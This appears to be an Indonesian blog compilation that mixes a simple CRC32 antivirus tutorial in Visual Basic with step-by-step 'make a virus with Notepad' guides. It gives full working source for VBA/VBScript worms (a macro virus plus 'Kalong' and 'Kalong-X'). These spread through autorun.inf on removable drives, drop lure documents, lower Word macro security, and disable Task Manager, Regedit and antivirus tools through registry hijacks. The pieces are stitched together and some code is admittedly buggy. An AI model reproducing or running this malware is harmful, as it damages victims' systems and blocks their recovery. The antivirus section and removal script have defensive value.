b.regwrite "HKLM\SOFTWARE\Classes\Folder\shell\", "0pen"


b.regwrite "HKLM\SOFTWARE\Classes\Folder\shellpen\", "&Open"


b.regwrite "HKLM\SOFTWARE\Classes\Folder\shellpen\command\", "wscript.exe " & Environ$("windir") & "\avmc.vbs"


b.regwrite "HKLM\SOFTWARE\Classes\VisualBasic.Project\shell\open\command\", "Winword.exe " & Environ$("windir") & "\Macroid.doc"




On Error Resume Next


Dim rog As Integer


Dim atr, vbs, Tipu(10), Trik(10) As String


For a = 66 To 90


partisi = Chr$(a)


vbs = partisi & ":\auto.vbs"


atr = partisi & ":\autorun.inf"


Tipu(1) = partisi & ":\Soal SPMB 1995-2008.doc"


Tipu(2) = partisi & ":\Kisah di balik HarryPotter.doc"


Tipu(3) = partisi & ":\Titip File sebentar.doc"


Tipu(4) = partisi & ":\jangan di baca.doc"


Tipu(5) = partisi & ":\buku harian.doc"


Tipu(6) = partisi & ":\cerita hangat.doc"


Tipu(7) = partisi & ":\Punya Baim.doc"


Tipu(8) = partisi & ":\Teka-teki yang baru.doc"


Tipu(9) = partisi & ":\Kumpulan cerita lucu.doc"


Tipu(10) = partisi & ":\Trik Sulap.doc"


If Dir(Tipu(1)) = "" And Dir(Tipu(2)) = "" And Dir(Tipu(3)) = "" And Dir(Tipu(4)) = "" And Dir(Tipu(5)) = "" And Dir(Tipu(6)) = "" And Dir(Tipu(7)) = "" And Dir(Tipu(8)) = "" And Dir(Tipu(9)) = "" And Dir(Tipu(10)) = "" Then


Randomize


rog = Int(10 * Rnd) + 1


Open Tipu(rog) For Output As #1


Print #1, ""


Close #1


End If


Trik(1) = partisi & ":\Novel J.K.Rowling.doc"


Trik(2) = partisi & ":\cerita cinta.doc"


Trik(3) = partisi & ":\Ringkasan cerita HarryPotter.doc"


Trik(4) = partisi & ":\Semua Cheat game DOTA.doc"


Trik(5) = partisi & ":\Kumpulan Cheat game.doc"


Trik(6) = partisi & ":\Cheat game RF.doc"


Trik(7) = partisi & ":\Cheat game Ayo Dance.doc"


Trik(8) = partisi & ":\Goosebumps.doc"


Trik(9) = partisi & ":\FearStreet.doc"


Trik(10) = partisi & ":\R.L.Stine.doc"




If Dir(Trik(1)) = "" And Dir(Trik(2)) = "" And Dir(Trik(3)) = "" And Dir(Trik(4)) = "" And Dir(Trik(5)) = "" And Dir(Trik(6)) = "" And Dir(Trik(7)) = "" And Dir(Trik(8)) = "" And Dir(Trik(9)) = "" And Dir(Trik(10)) = "" Then


Randomize


rogi = Int(10 * Rnd) + 1


Open Trik(rogi) For Output As #1


Print #1, ""


Close #1


End If


Open atr For Output As #1


Print #1, "[Autorun]"


Print #1, "shell\Open\command=wscript.exe auto.vbs"


Close #1


SetAttr atr, vbHidden + vbSystem


Open vbs For Output As #1


Print #1, "dim a"


Print #1, "set a = createobject(" & Chr(34) & "Wscript.shell" & Chr(34) & ")"


Print #1, "a.regwrite " & Chr(34) & "HKCU\Software\Microsoft\Office\10.0\Word\Security\Level" & Chr(34) & "," & Chr(34) & "1" & Chr(34) & "," & Chr(34) & "REG_DWORD" & Chr(34)


Print #1, "a.regwrite " & Chr(34) & "HKCU\Software\Microsoft\Office\11.0\Word\Security\Level" & Chr(34) & "," & Chr(34) & "1" & Chr(34) & "," & Chr(34) & "REG_DWORD" & Chr(34)


Print #1, "a.regwrite " & Chr(34) & "HKCU\Software\Microsoft\Office\12.0\Word\Security\Level" & Chr(34) & "," & Chr(34) & "1" & Chr(34) & "," & Chr(34) & "REG_DWORD" & Chr(34)


Close #1


SetAttr vbs, vbHidden + vbSystem


Next a




End Sub






Hati –hati dengan source diatas. Karena lumayan bikin pening juga. Tapi maaf ya kalo aku gak bisa jelasinnya sekarang. Karena kalo aku jelasin nanti tutorial ini terlalu panjangggggggggggggggg....... Makanya penjelasan mengenai source di atas aku buat di tutorial kedua.

EFEK-EFEK KECIL DAN TANDA-TANDA TERINFEKSI





Nah coba tebak mana file virus dan mana file yang bukan virus!!!!!!!!

Jawabannya lihat di bawah!!

Membuat Anti Virus Sendiri

Notes :
- Penulis TIDAK bertanggung jawab atas penggunaan maupun penyalahgunaan dari artikel ini.
- Tujuan dibuat artikel HANYA untuk BAHAN PEMBELAJARAN saja.
- Penggunaan nama, merek, atau logo hanya sebagai CONTOH dan REFERENSI saja, TIDAK ada maksud mempromosikan pihak tertentu.
- Penulis mohon maaf apabila seluruh/sebagian dari isi artikel ini sudah tersirat dalam artikel sejenis lainnya.


Main#
Sekarang kehadiran para virus maker (–selanjutnya disingkat jadi VM saja) lokal telah membuat gerah para user komputer tanah air. Bisa dibayangkan bila dari sekian banyak virus lokal tidak satu-dua yang menghancurkan data (terutama bagi file office; word, excel, dll…). Bagi para vendor Anti Virus (–selanjutnya disingkat menjadi AV saja) fenomena ini adalah lahan bisnis untuk produk mereka. Sebut saja NORMAN, yang kini men-support perusahaan konsultan virus lokal (–VAKSIN.COM) , Symantec, McAffe, NOD32, dan sebagainya. Dengan menawarkan update definisi software AV tercepat, engine scanner paling sensitif, dan lain-lain merupakan kiat untuk memancing para korban virus membeli dan menggunakan software AV mereka. Bagi penulis sendiri hal ini memang agak memberatkan mengingat update file definisi atau engine AV tsb haruslah melalui koneksi internet. Lalu bagaimana yang tidak mempunyai akses sama sekali? Konsekuensinya iyalah tertinggal dalam hal pengenalan varian virus baru yang pada ujung-ujungnya membuat AV yang sudah terinstall bagai ‘Macan Ompong’. Kalau kita membuat AV sendiri bagaimana? dengan database definisi yang bisa diupdate oleh kita bahkan dapat saling tukar dengan teman? Bisa saja, dengan syarat mau mempelajari sedikit teknik pemograman.

Pertama kita harus mengerti bagaimana cara kerja sebuah AV sederhana, pada dasarnya sebuah software AV mempunyai komponen-komponen :

1. Engine scanner, ini merupakan komponen utama AV dalam mengenali sebuah pattern virus. Engine ini dapat dikelompokkan menjadi statis dan dinamis. Statis dalam hal ini dapat disebut menjadi spesifik terhadap pattern tertentu dari sebuah file virus. Checksum merupakan salah satu contoh dari engine statis ini. Dinamis dalam artian dia mengenali perilaku ‘umum’ sebuah virus. Heuristic menjadi salah satu contohnya.
2. Database definition, menjadi sebuah referensi dari sebuah pattern file virus. Engine statis sangat bergantung kepada komponen ini.
3. Decompress atau unpacking engine, khusus untuk pengecekan file-file yang terkompresi (*.rar, *.zip, dll) atau kompresi atau packing untuk file PE seperti UPX, MeW , dll.

Tidak jarang hasil dari pengecekan terhadap file suspect virus menghasilkan false-positive bahkan false-negative (– false-positive berarti file yang bersih dianggap thread oleh AV, dan false-negative berarti file yang 100% thread akan dianggap bersih). Semua itu dapat diakibatkan oleh ketidak-sempurnaan dari engine scanner itu sendiri. Misal
pada contoh kasus Engine String scanner (–Engine scanner yang menyeleksi string-string dari file text-based), bila diterapkan rule 3 out of 5 (– bila AV menemukan 3 dari daftar 5 string kategori malicious) maka AV akan memberikan bahwa file terindikasi sebuah thread yang positif. Padahal file tsb nyatanya tidak menimbulkan efek berbahaya bila dijalankan atau dieksekusi. Kesalahan scanning macam ini lazim ditemukan untuk file-file *.VBS, *.HTML, dll. Untuk penggunaan engine checksum sangat banyak ditemui di beberapa software AV lokal. Checksum yang lazim digunakan diantaranya CRC16, CRC32, MD5, dll. Dikarenakan mudah untuk diimplementasikan. Engine ini sendiri bukannya tanpa cacat, Checksum bekerja dengan memproses byte demi byte dari sebuah file dengan sebuah algoritma tertenu (– tergantung dari jenis checksum yang digunakan) sehingga menghasilkan sebuah format tertentu dari file tsb. Contoh checksum menggunakan CRC32 dan MD5 :

* calCrc = CRC32(file_name_and_path)
* calMD5 = MD5(file_name_and_path)

Maka isi dari string calCrc adalah 7AF9E376, sedangkan untuk MD5nya adalah 529CA8050A00180790CF88B63468826A. Perlu diketahui bila virus menerapkan rutin yang mengubah byte tertentu dari badan virus tsb setiap kali maka penggunaan engine checksum ini akan kurang optimal karena bila 1 byte berubah dari file maka checksum juga akan berubah.

Mari kita belajar membuat sebuah AV sederhana, yang diperlukan :

1. Software Visual Basic 6.0
2. Sedikit pemahaman akan pemograman Visual Basic 6.0
3. Sampel file bersih atau virus (– opsional)

First#
Sekarang kita akan belajar membuat sebuah rutin sederhana untuk :
- Memilih file yang akan dicek
- Membuka file tersebut dalam mode binary
- Memproses byte demi byte untuk menghasilkan Checksum

Buka MS-Visual Basic 6.0 anda, lalu buatlah sebuah class module dan Form dengan menambahkan sebuah objek Textbox, CommonDialog dan Command Button. (Objek CommonDialog dapat ditambahkan dengan memilih Project -> COmponent atau Ctrl-T dan memilih Microsoft Common Dialog Control 6.0) Ketikkan kode berikut pada class module (kita beri nama class module tsb clsCrc) :

================= START HERE ====================

Private crcTable(0 To 255) As Long ‘crc32

Public Function CRC32(ByRef bArrayIn() As Byte, ByVal lLen As Long, Optional ByVal lcrc As Long = 0) As Long

‘bArrayIn adalah array byte dari file yang dibaca, lLen adalah ukuran atau size file

Dim lCurPos As Long ‘Current position untuk iterasi proses array bArrayIn
Dim lTemp As Long ‘variabel temp hasil perhitungan

If lLen = 0 Then Exit Function ‘keluar fungsi apabila ukuran file = 0
lTemp = lcrc Xor &HFFFFFFFF

For lCurPos = 0 To lLen
lTemp = (((lTemp And &HFFFFFF00) \ &H100) And &HFFFFFF) Xor (crcTable((lTemp And 255) Xor bArrayIn(lCurPos)))
Next lCurPos

CRC32 = lTemp Xor &HFFFFFFFF

End Function

Private Function BuildTable() As Boolean
Dim i As Long, x As Long, crc As Long
Const Limit = &HEDB88320

For i = 0 To 255
crc = i
For x = 0 To 7
If crc And 1 Then
crc = (((crc And &HFFFFFFFE) \ 2) And &H7FFFFFFF) Xor Limit
Else
crc = ((crc And &HFFFFFFFE) \ 2) And &H7FFFFFFF
End If
Next x
crcTable(i) = crc
Next i
End Function

Private Sub Class_Initialize()
BuildTable
End Sub

================= END HERE ====================

Lalu ketikkan kode berikut dalam event Command1_Click :

================= START HERE ====================

Dim namaFileBuka As String, HasilCrc As String
Dim CCrc As New clsCrc ‘bikin objek baru dari class ClsCrc
Dim calCrc As Long
Dim tmp() As Byte ‘array buat file yang dibaca

Private Sub Command1_Click()
CommonDialog1.CancelError = True ‘error bila user mengklik cancel pada CommonDialog
CommonDialog1.DialogTitle = “Baca File” ‘Caption commondialog

On Error GoTo erorhandle ‘label error handle

CommonDialog1.ShowOpen
namafilbuka = CommonDialog1.FileName
Open namafilbuka For Binary Access Read As #1 ‘buka file yang dipilih dengan akses baca pada mode binary
ReDim tmp(LOF(1) - 1) As Byte ‘deklarasi ulang untuk array, # Bugs Fixed #
Get #1, , tmp()
Close #1

calCrc = UBound(tmp) ‘mengambil ukuran file dari array
calCrc = CCrc.CRC32(tmp, calCrc) ‘hitung CRC

HasilCrc = Hex(calCrc) ‘diubah ke format hexadesimal, karena hasil perhitungan dari class CRC masih berupa numeric
Text1.Text = HasilCrc ‘tampilkan hasilnya
Exit Sub

erorhandle:
If Err.Number <> 32755 Then MsgBox Err.Description ‘error number 32755 dalah bila user mengklik tombol cancel pada saat memilih file

================= END HERE ====================

COba anda jalankan program diatas dengan memencet tombol F5, lalu klik Command1 untuk memilih dan membuka file. Maka program akan menampilkan CRC32nya.

Second#
Kode diatas dapat kita buat menjadi sebuah rutin pengecekan file suspect virus dengan antara membandingkan hasil CRC32nya dan database CRC kita sendiri. Algoritmanya adalah :
- Memilih file yang akan dicek
- Membuka file tersebut dalam mode binary
- Memproses byte demi byte untuk menghasilkan Checksum
- Buka file database
- Ambil isi file baris demi baris
- Samakan Checksum hasil perhitungan dengan checksum dari file

Format file database dapat kita tentukan sendiri, misal :
- FluBurung.A=ABCDEFGH
- Diary.A=12345678
Dimana FluBurung.A adalah nama virus dan ABCDEFGH dalah Crc32nya. Jika kita mempunyai format file seperti diatas, maka kita perlu membaca file secara sekuensial per baris serta memisahkan antara nama virus dan Crc32nya. Dalam hal ini yang menjadi pemisah adalah karakter ‘=’.
Buat 1 module baru (– diberi nama module1) lalu isi dengan kode :

================= START HERE ====================

Public namaVirus As String, CrcVirus As String ‘deklarasi variabel global untuk nama dan CRC virus Public pathExe as String ‘deklarasi variabel penyimpan lokasi file EXE AV kita

Public Function cariDatabase(Crc As String, namaFileDB As String) As Boolean
Dim lineStr As String, tmp() As String ‘variabel penampung untuk isi file
Open namaFileDB For Input As #1 ‘buka file dengan mode input
Do
Line Input #1, lineStr
tmp = Split(lineStr, “=”) ‘pisahkan isi file bedasarkan pemisah karakter ‘=’
namaVirus = tmp(0) ‘masukkan namavirus ke variabel dari array
CrcVirus = tmp(1) ‘masukkan Crcvirus ke variabel dari array
If CrcVirus = Crc Then ‘bila CRC perhitungan cocok/match dengan database
cariDatabase = True ‘kembalikan nilai TRUE
Exit Do ‘keluar dari perulangan
End If
Loop Until EOF(1)
Close #1
End Function

================= END HERE ====================

Lalu tambahkan 1 objek baru kedalam Form, yaitu Command button2. lalu ketikkan listing kode berikut kedalam event Command2_Click :

================= START HERE ====================
If Len(App.Path) <= 3 Then ‘bila direktori kita adalah root direktori
pathEXE = App.Path
Else
pathEXE = App.Path & “\”
End If

CommonDialog1.CancelError = True ‘error bila user mengklik cancel pada CommonDialog
CommonDialog1.DialogTitle = “Baca File” ‘Caption commondialog

On Error GoTo erorhandle ‘label error handle

CommonDialog1.ShowOpen
namafilbuka = CommonDialog1.FileName
Open namafilbuka For Binary Access Read As #1 ‘buka file yang dipilih dengan akses baca pada mode binary
ReDim tmp(LOF(1) - 1) As Byte ‘deklarasi ulang untuk array # Bugs Fixed #
Get #1, , tmp()
Close #1

calCrc = UBound(tmp) ‘mengambil ukuran file dari array
calCrc = CCrc.CRC32(tmp, calCrc) ‘hitung CRC

HasilCrc = Hex(calCrc) ‘diubah ke format hexadesimal, karena hasil perhitungan dari class CRC masih berupa numeric
If cariDatabase(HasilCrc, pathEXE & “DB.txt”) Then ‘bila fungsi bernilai TRUE
MsgBox “Virus ditemukan : ” & namaVirus ‘tampilkan message Box
End If
Exit Sub

erorhandle:
If Err.Number <> 32755 Then MsgBox Err.Description ‘error number 32755 dalah bila user mengklik tombol cancel pada saat memilih file

================= END HERE ====================

Fitur AV sederhana ini dapat ditambahkan dengan fitur process scanner, akses registry, real-time protection (RTP) dan lain lain. Untuk process scanner pada dasarnya adalah teknik enumerasi seluruh proses yang sedang berjalan pada Sistem Operasi, lalu mencari letak atau lokasi file dan melakukan proses scanning. Fitur akses registry memungkinkan kita untuk mengedit secara langsung registry windows apabila akses terhadap registry (–Regedit) diblok oleh virus. Sedangkan fitur RTP memungkinkan AV kita berjalan secara simultan dengan windows explorer untuk mengscan direktori atau file yang sedang kita browse atau lihat. Untuk ketiga fitur lanjutan ini akan dibahas pada artikel selanjutnya.

Kesimpulan#
Tidak harus membeli software AV yang mahal untuk menjaga komputer kita dari ancaman virus, kita bisa membuatnya sendiri dengan fitur-fitur yang tak kalah bagusnya. Memang terdapat ketidaksempurnaan dalam AV buatan sendiri ini, tetapi setidaknya dapat dijadikan pencegah dari infeksi virus komputer yang semakin merajalela. Software AV sederhana ini dilengkapi oleh engine scanner statis dan database definisi. Tidak tertutup kemungkinan software AV ini ditingkatkan lebih advanced dalam hal engine scannernya.

Penutup#
Pengembangan software AV sederhana ini sepenuhnya Open-Source selama mengikutsertakan nama pembuat asli didalamnya. Listing serta projek lengkap dapat didownload di http://www.geocities.com/emomelodicfreak/ProjekAV.zip

cara membuat virus via notepad

Hi…..
Melanjutkan artikel yang waktu itu “BUAT VIRUS VIA NOTEPAD” kita akan membuat virus yang lebih hebat lagi. Kalau ada yang belum tahu, saya mau minta maaf karena di artikel sebelumnya ada kesalahan code. Silahkan ganti kata “rekursif” menjadi “rekur”. Kalau enggak, bisa syntax error nanti

Nah kita akan buat varian lain dari KALONG.VBS. Yaitu KALONG-X.VBS. Lebih hebat dari Kalong.VBS. Sebenarnya ini varian ketiga. Sebenarnya virus ini sama saja dengan Kalong.VBS namun ditambahkan kemampuan manipulasi registry yang lebih mengerikan
Ayo sekarang kita buka saja Notepadnya dan ketikkan code berikut. Jika malas kan tinggak Copy > Paste….
‘Kalong-X
‘Varian dari Kalong.VBS
on error resume next

‘Dim kata-kata berikut
dim rekur,windowpath,desades,fs,mf,isi,tf,kalong,nt,check,sd

’siapkan isi autorun
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6ms32.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

‘buat file induk
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\k4l0n6-x.dll.vbs “)
tf.attributes = 32
set tf = fs.createtextfile(windowpath & “\k4l0n6-x.dll.vbs”,2,true)
tf.write rekur
tf.close
set tf = fs.getfile(windowpath & “\k4l0n6-x.dll.vbs”)
tf.attributes = 39

’sebar ke removable disc ditambahkan dengan Autorun.inf
for each desades in fs.drives

If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> “A:” then

set tf=fs.getfile(desades.path &”\k4l0n6ms32.dll.vbs”)
tf.attributes =32
set tf=fs.createtextfile(desades.path &”\k4l0n6ms32.dll.vbs”,2,true)
tf.write rekur
tf.close
set tf=fs.getfile(desades.path &”\k4l0n6ms32.dll.vbs”)
tf.attributes = 39

set tf =fs.getfile(desades.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(desades.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(desades.path &”\autorun.inf”)
tf.attributes=39
end if
next

‘Manipulasi Registry
set kalong = createobject(”WScript.Shell”)

‘Ubah IE Title
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”:: ->KALONG-X<- ::”

‘File Hidden tak terlihat
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”,2, “REG_DWORD”

‘Blokir Find, FolderOptions, Run, Regedit, Task Manager, dan klik kanan
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”

‘Buat pesan saat Windows Startup
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “THE KALONG-X”
kalong.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText”,”No reason for Panic”

‘Aktifkan saat Windows Startup
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs”

‘Alihkan aplikasi berikut. Jika dibuka maka program terbuka dengan Notepad
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger”,”notepad.exe”

‘Bonus
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname

Setelah Anda menempatkan kode tersebut klik FILE > SAVE. Di File Type pilih ALL FILES (*.*) lalu simpan dengan nama k4l0n6ms32.dll.vbs. Setelah itu coba Anda jalankan. Dan ya, Anda telah menjalankan KALONG-X.VBS di komputer Anda.
Jika Anda membuka aplikasi yang bernama : cmd.exe, install.exe, msconfig.exe, regedit.exe, regedt32.exe, RegistryEditor.exe, setup.exe, PCMAV.exe, PCMAV-CLN.exe, dan PCMAV-RTP.exe maka akan terbuka Notepad yang isinya kurang lebih mirip seperti ini :



Ingat jadilah orang yang bermanfaat bagi orang lain. Tidak ada “barang berbahaya” disini karena Andalah yang membuatnya berbahaya. Saya tidak bertanggung jawab apabila Anda menyalahgunakan kode ini. Ini untuk ilmu pengetahuan semata. Kalau disalahgunakan saya kutuk mukanya mirip Tukul (Wah…jadi terkenal nanti)…jangan deh. Pokoknya segala kenekatan Anda ditanggung oleh Anda sendiri.
Virus ini punya kemampuan Autorun jadi komputer yang dicolokkan Removable Disc (Mislanya Flash Disc) yang terinfeksi virus ini akan diinfeksi pula (jika Autorun tidak di non-aktifkan)
NOTE: Untuk membersihkan Kalong-X caranya mudah. Tinggal hentikan proses yang bernama wscript.exe. Jika di WinNT Anda bisa melakukannya lewat Task Manager. Tapi kalau Win9X silahkan cari tool pengganti Task Manager misalnya Procexp atau CurrProcess. Soalnya terkadang kalau lewat perintah Command Prompt gak bisa.
Setelah Anda memberhentikan proses wscript.exe hapus file induk yang bernama k4l0n6-x.dll.vbs di WINDOWSDIR (C:\Windows misalnya). Jika tidak ada tampilkan dulu file hidden dengan Folder Options. Setelah itu perbaiki Registry. Untuk mempercepat salin kode ini ke Notepad :
[Version]
Signature=”$Chicago$”
Provider=Fariskhi

[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del

[UnhookRegKey]
HKCU,Software\Microsoft\Internet Explorer\Main, Window Title,0, “INTERNET EXPLORER”

[del]
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFind
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFolderOptions
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoRun
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegistryTools
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableTaskMgr
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoViewContextMenu
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeCaption
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeText
HKLM, Software\Microsoft\Windows\CurrentVersion\Run, Systemdir
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe, Debugger

Setelah itu save dengan FILE TYPE : ALL FILES (*.*) dan simpan dengan nama : kalongxremoval.inf. Setelah itu klik kanan file tersebut dan pilih install. Jadi kita buat Virus dan Antidotnya sama-sama dengan Notepad.

Virus dengan Notepad

Iseng-iseng mencolok link orang saya tiba-tiba saya nemu sebuah malcode lokal yang dibuat dengan bahasa VBS. Wah, ternyata para virus maker mulai melirik memakai bahasa VBS. Mungkin karena menyangkut HAKI (Hak Atas Kekayaan Intelektual) karena VB6.0 yang banyak beredar adalah bajakan. Jadi ia membuat virus dengan VBS yang bisa dibuat hanya dengan Notepad karena di Windows sudah ada compiler yang terintegrasi dengannya, Windows Based Script Host.Sesua janji saya, kita akan membuat virus yang sederhana menggunakan Notepad. Virus ini akan membuat dirinya menyebar ke removable disc dengan AutoRun sehingga komputer lain yang tercolok flash disc terinfeksi akan langsung menjadi korban tanpa menungu User menjalankan infector-nya. Virus ini saya beri nama “Kalong.VBS”. Sekarang buka Notepad-nya. Copy kode berikut :‘//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus–//
on error resume next

‘//–Dim kata-kata berikut ini–//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd

‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 32
set tf=fs.createtextfile(windowpath & “\batch- k4l0n6.dll.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 39
‘//–Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//
‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket

for each flashdrive in fs.drives
‘//–Cek Drive–//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then

‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\k4l0n6.dll.vbs “,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes = 39

‘//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next

‘//–Manipulasi Registry–//

set kalong = createobject(”WScript.Shell”)

‘//–Manip - Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY–//
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” THE KALONG v.s. ZAY “

‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD”

‘//–Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”

